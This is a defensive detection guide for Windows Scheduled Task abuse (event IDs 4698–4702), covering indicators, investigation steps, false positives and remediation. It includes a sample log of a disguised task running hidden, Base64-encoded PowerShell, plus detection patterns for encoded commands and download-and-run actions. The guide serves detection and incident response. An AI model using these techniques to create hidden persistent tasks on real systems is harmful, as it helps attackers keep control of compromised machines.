EventPeeker
Analyze EVTX Logs Free →·Detection guides
Event ID 4698Event ID 4699Event ID 4700Event ID 4701Event ID 4702Event ID 4688T1053.005high

Scheduled Task Abuse — Persistence and Lateral Execution

Windows Scheduled Tasks are a primary persistence mechanism abused by malware, ransomware, and post-exploitation frameworks. Attackers create tasks that survive reboots, run under SYSTEM context, and are easy to disguise with legitimate-sounding names.

Severity

High

ATT&CK Tactic

Persistence

Common attacker usage

Creating tasks that re-execute malware after reboot or user logoff · Running payloads under SYSTEM or high-privilege account context · Naming tasks to blend with legitimate Windows tasks (e.g. 'MicrosoftEdgeUpdateTaskMachine') · Using tasks to execute encoded PowerShell or download-and-run payloads · Modifying existing legitimate tasks to execute additional malicious actions · Creating tasks on remote hosts via at.exe, schtasks.exe, or WMI for lateral movement

Investigate immediately if

  • !New task created outside of business hours or during a known attack window
  • !Task action contains PowerShell -enc, cmd /c, or a URL
  • !Task runs as SYSTEM or a service account and was created by an interactive user session
  • !Task name closely resembles a legitimate Windows task name but is in an unexpected location
  • !Task was created remotely (source IP is not a management server)

MITRE ATT&CK

Technique

T1053.005 · Scheduled Task

Tactic

Persistence

View on attack.mitre.org →

Security Relevance

Scheduled tasks are appealing to attackers because they require no kernel-level access, survive reboots automatically, can run in any user context including SYSTEM, and are difficult to detect without proper auditing. Event ID 4698 logs task creation with the full XML task definition including the action, trigger, and principal — this is the richest source of persistence evidence available in the Security event log.

Indicators of Malicious Use

  • Task action executing PowerShell with -EncodedCommand, -enc, or -w hidden
  • Task action pointing to a binary in %TEMP%, %APPDATA%, or a user-writable path
  • Task created by an account that doesn't normally create tasks (e.g. service accounts, standard users)
  • Task trigger set to OnLogon, OnIdle, or a very frequent repeat interval
  • Task principal running as SYSTEM when created by a non-admin process
  • Task XML containing a URL in the command or arguments field

Example Log Entry

Log Name: Security
Source:    Microsoft-Windows-Security-Auditing
Event ID:  4698

A scheduled task was created.

Subject:
  Account Name:  CORP\jsmith
  Logon ID:      0x4f2a1

Task Information:
  Task Name: \Microsoft\Windows\WindowsDefenderCheck
  Task Content:
    <Actions>
      <Exec>
        <Command>powershell.exe</Command>
        <Arguments>-WindowStyle Hidden -EncodedCommand JABjACAAPQ...</Arguments>
      </Exec>
    </Actions>

Investigation Steps

  1. 1.Read the full task XML — the Action element contains exactly what will execute. Decode any Base64 arguments.
  2. 2.Check the Principal — tasks running as SYSTEM created by a standard user session are highly suspicious.
  3. 3.Check the Trigger — tasks triggered on logon, at startup, or at very frequent intervals warrant closer inspection.
  4. 4.Check the Subject — who created the task, and was that account legitimately logged in at that time?
  5. 5.Look for schtasks.exe or taskschd.dll in Event ID 4688 process creation logs around the same time.
  6. 6.Check if the task action binary exists on disk and whether it is signed.
  7. 7.Search for the same task name across all endpoints — ransomware and worms often replicate the same task on multiple hosts.

Check your own logs for this technique — upload an EVTX file for instant detection, no account required.

Upload EVTX →See sample

Common False Positives

  • Software installers creating legitimate update tasks (Windows Update, Chrome, Office)
  • IT management tools (SCCM, PDQ) deploying scripts via scheduled tasks
  • Developer tools or build agents creating temporary tasks
  • Backup and antivirus agents creating maintenance tasks

Remediation

  • Delete the malicious task immediately: schtasks /delete /tn <task_name> /f
  • Review all scheduled tasks on the host: Get-ScheduledTask | Where-Object {$_.TaskPath -notlike '\Microsoft\*'}
  • Check for associated files — the task's action binary may be a dropper; remove it and run a full scan.
  • Rotate credentials for any account listed as the task's principal.
  • Enable Task Scheduler auditing if not already enabled — requires 'Audit Other Object Access Events' in Advanced Audit Policy to capture all five task lifecycle events (4698, 4699, 4700, 4701, 4702).
  • Restrict who can create scheduled tasks using Group Policy (deny schtasks.exe to non-admin accounts).

Related Event IDs

4698Scheduled task created — the primary detection event with full XML payload
4699Scheduled task deleted — attacker cleanup; 4698→4699 = one-time execution pattern
4700Scheduled task enabled — the arming step in the disable→modify→enable payload swap
4701Scheduled task disabled — defense impairment or prelude to task modification
4702Scheduled task modified — task hijacking; stealthier than creation because the task name stays trusted
4688Process creation — schtasks.exe or PowerShell Register-ScheduledTask used to create or modify the task

Related Detection Guides

WMI PersistenceSuspicious Service InstallationAccount-Based PersistenceRegistry Run Key PersistencePowerShell AbuseLateral MovementRansomware IndicatorsEvent ID 4698 — Scheduled Task Created

Analyze your Windows Event Logs

Upload an .evtx file from servers, domain controllers, or endpoints — get instant detections, MITRE mappings, and an AI-generated triage report.

Detect this technique in your logs →
← All detection guides·Analyze EVTX Logs Free →